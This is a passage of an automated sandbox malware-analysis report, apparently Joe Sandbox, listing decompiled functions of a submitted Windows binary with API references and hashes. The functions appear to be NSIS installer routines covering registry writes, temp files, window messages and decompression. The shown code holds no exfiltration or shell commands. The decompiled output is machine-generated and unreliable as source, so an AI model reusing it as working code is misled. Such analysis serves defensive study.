				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                                                                                                                                                            0x00401c43
                                                                                                                                                                                                                            0x00401c45
                                                                                                                                                                                                                            0x00401c4c
                                                                                                                                                                                                                            0x00401c4f
                                                                                                                                                                                                                            0x00401c52
                                                                                                                                                                                                                            0x00401c5c
                                                                                                                                                                                                                            0x00401c60
                                                                                                                                                                                                                            0x00401c63
                                                                                                                                                                                                                            0x00401c6c
                                                                                                                                                                                                                            0x00401c6c
                                                                                                                                                                                                                            0x00401c6f
                                                                                                                                                                                                                            0x00401c73
                                                                                                                                                                                                                            0x00401c7c
                                                                                                                                                                                                                            0x00401c7c
                                                                                                                                                                                                                            0x00401c7f
                                                                                                                                                                                                                            0x00401c83
                                                                                                                                                                                                                            0x00401c85
                                                                                                                                                                                                                            0x00401cda
                                                                                                                                                                                                                            0x00401cdc
                                                                                                                                                                                                                            0x00401ce7
                                                                                                                                                                                                                            0x00401cf1
                                                                                                                                                                                                                            0x00401cf4
                                                                                                                                                                                                                            0x00401cf4
                                                                                                                                                                                                                            0x00401cfd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00401c87
                                                                                                                                                                                                                            0x00401c8e
                                                                                                                                                                                                                            0x00401c90
                                                                                                                                                                                                                            0x00401c93
                                                                                                                                                                                                                            0x00401c99
                                                                                                                                                                                                                            0x00401ca0
                                                                                                                                                                                                                            0x00401ca3
                                                                                                                                                                                                                            0x00401ccb
                                                                                                                                                                                                                            0x00401d03
                                                                                                                                                                                                                            0x00401d03
                                                                                                                                                                                                                            0x00401ca5
                                                                                                                                                                                                                            0x00401cb3
                                                                                                                                                                                                                            0x00401cbb
                                                                                                                                                                                                                            0x00401cbe
                                                                                                                                                                                                                            0x00401cbe
                                                                                                                                                                                                                            0x00401ca3
                                                                                                                                                                                                                            0x00401d06
                                                                                                                                                                                                                            0x00401d09
                                                                                                                                                                                                                            0x00401d0f
                                                                                                                                                                                                                            0x00402ba4
                                                                                                                                                                                                                            0x00402ba4
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                                                                                                            • String ID: !
                                                                                                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                            • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                                                                                                                                                            • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 933 40248a-4024bb call 402da6 * 2 call 402e36 940 4024c1-4024cb 933->940 941 402c2a-402c39 933->941 942 4024cd-4024da call 402da6 lstrlenW 940->942 943 4024de-4024e1 940->943 942->943 947 4024e3-4024f4 call 402d84 943->947 948 4024f5-4024f8 943->948 947->948 951 402509-40251d RegSetValueExW 948->951 952 4024fa-402504 call 403371 948->952 955 402522-402603 RegCloseKey 951->955 956 40251f 951->956 952->951 955->941 956->955
                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				char _t27;
				int _t30;
				void* _t32;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5f8) + _t29 + 2;
					}
					if(_t37 == 4) {
						_t27 = E00402D84(3);
						_pop(_t32);
						 *0x40b5f8 = _t27;
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E00403371(_t32,  *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f8, 0x1800); // executed
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f8, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey(); // executed
				}
				 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
				return 0;
			}















                                                                                                                                                                                                                            0x0040248a
                                                                                                                                                                                                                            0x0040248a
                                                                                                                                                                                                                            0x0040248a
                                                                                                                                                                                                                            0x0040248a
                                                                                                                                                                                                                            0x0040248d
                                                                                                                                                                                                                            0x00402494
                                                                                                                                                                                                                            0x0040249e
                                                                                                                                                                                                                            0x004024a1
                                                                                                                                                                                                                            0x004024aa
                                                                                                                                                                                                                            0x004024b1
                                                                                                                                                                                                                            0x004024b8
                                                                                                                                                                                                                            0x004024bb
                                                                                                                                                                                                                            0x004024c1
                                                                                                                                                                                                                            0x004024cb
                                                                                                                                                                                                                            0x004024cf
                                                                                                                                                                                                                            0x004024da
                                                                                                                                                                                                                            0x004024da
                                                                                                                                                                                                                            0x004024e1
                                                                                                                                                                                                                            0x004024e5
                                                                                                                                                                                                                            0x004024ea
                                                                                                                                                                                                                            0x004024eb
                                                                                                                                                                                                                            0x004024f1
                                                                                                                                                                                                                            0x004024f4
                                                                                                                                                                                                                            0x004024f4
                                                                                                                                                                                                                            0x004024f8
                                                                                                                                                                                                                            0x00402504
                                                                                                                                                                                                                            0x00402504
                                                                                                                                                                                                                            0x00402515
                                                                                                                                                                                                                            0x0040251d
                                                                                                                                                                                                                            0x0040251f
                                                                                                                                                                                                                            0x0040251f
                                                                                                                                                                                                                            0x00402522
                                                                                                                                                                                                                            0x004025fd
                                                                                                                                                                                                                            0x004025fd
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                                                                                                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseValuelstrlen
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp
                                                                                                                                                                                                                            • API String ID: 2655323295-2564968948
                                                                                                                                                                                                                            • Opcode ID: ccbced7c383fe36513b27ab0f3831983de96ef15fa0590e398bf5cccbf7e4235
                                                                                                                                                                                                                            • Instruction ID: a516967871aadb8e7373f7254d3c24ec0cdbd982f2b4049ed7d94b0996b6da2b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ccbced7c383fe36513b27ab0f3831983de96ef15fa0590e398bf5cccbf7e4235
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4011AF71E00108BEEF10AFA1CE49EAEB6B8EB44354F11443AF404B61C1DBB98D409658
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 958 406187-406193 959 406194-4061c8 GetTickCount GetTempFileNameW 958->959 960 4061d7-4061d9 959->960 961 4061ca-4061cc 959->961 963 4061d1-4061d4 960->963 961->959 962 4061ce 961->962 962->963
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                                                                                                                                                                            0x0040618d
                                                                                                                                                                                                                            0x00406193
                                                                                                                                                                                                                            0x00406194
                                                                                                                                                                                                                            0x00406194
                                                                                                                                                                                                                            0x00406199
                                                                                                                                                                                                                            0x0040619a
                                                                                                                                                                                                                            0x0040619d
                                                                                                                                                                                                                            0x004061a2
                                                                                                                                                                                                                            0x004061a5
                                                                                                                                                                                                                            0x004061af
                                                                                                                                                                                                                            0x004061bc
                                                                                                                                                                                                                            0x004061c0
                                                                                                                                                                                                                            0x004061c8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004061cc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004061ce
                                                                                                                                                                                                                            0x004061ce
                                                                                                                                                                                                                            0x004061ce
                                                                                                                                                                                                                            0x004061d1
                                                                                                                                                                                                                            0x004061d4
                                                                                                                                                                                                                            0x004061d4
                                                                                                                                                                                                                            0x004061d7
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004061A5
                                                                                                                                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                            • API String ID: 1716503409-1968954121
                                                                                                                                                                                                                            • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                                                                                                                                                            • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                                                                                                                                                                                            0x004015c1
                                                                                                                                                                                                                            0x004015c9
                                                                                                                                                                                                                            0x004015cc
                                                                                                                                                                                                                            0x004015d1
                                                                                                                                                                                                                            0x004015d5
                                                                                                                                                                                                                            0x004015d7
                                                                                                                                                                                                                            0x004015df
                                                                                                                                                                                                                            0x004015e1
                                                                                                                                                                                                                            0x004015e4
                                                                                                                                                                                                                            0x004015ea
                                                                                                                                                                                                                            0x00401604
                                                                                                                                                                                                                            0x00401607
                                                                                                                                                                                                                            0x004015ec
                                                                                                                                                                                                                            0x004015ec
                                                                                                                                                                                                                            0x004015ef
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004015fa
                                                                                                                                                                                                                            0x004015fd
                                                                                                                                                                                                                            0x004015fd
                                                                                                                                                                                                                            0x004015ef
                                                                                                                                                                                                                            0x0040160e
                                                                                                                                                                                                                            0x00401615
                                                                                                                                                                                                                            0x00401624
                                                                                                                                                                                                                            0x00401624
                                                                                                                                                                                                                            0x00401617
                                                                                                                                                                                                                            0x0040161a
                                                                                                                                                                                                                            0x00401622
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00401622
                                                                                                                                                                                                                            0x00401615
                                                                                                                                                                                                                            0x00401627
                                                                                                                                                                                                                            0x0040162b
                                                                                                                                                                                                                            0x0040162c
                                                                                                                                                                                                                            0x004015d7
                                                                                                                                                                                                                            0x00401634
                                                                                                                                                                                                                            0x00401663
                                                                                                                                                                                                                            0x004022f1
                                                                                                                                                                                                                            0x00401636
                                                                                                                                                                                                                            0x00401638
                                                                                                                                                                                                                            0x00401645
                                                                                                                                                                                                                            0x0040164d
                                                                                                                                                                                                                            0x00401655
                                                                                                                                                                                                                            0x0040165b
                                                                                                                                                                                                                            0x0040165b
                                                                                                                                                                                                                            0x00401655
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560,00000000), ref: 00405FF0
                                                                                                                                                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                                                                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                              • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                                            • API String ID: 1892508949-501415292
                                                                                                                                                                                                                            • Opcode ID: ff9909915b16c23767ee925164981e8f632181fd0fe0b495a8c7e415af322c96
                                                                                                                                                                                                                            • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff9909915b16c23767ee925164981e8f632181fd0fe0b495a8c7e415af322c96
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 99%
                                                                                                                                                                                                                            			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
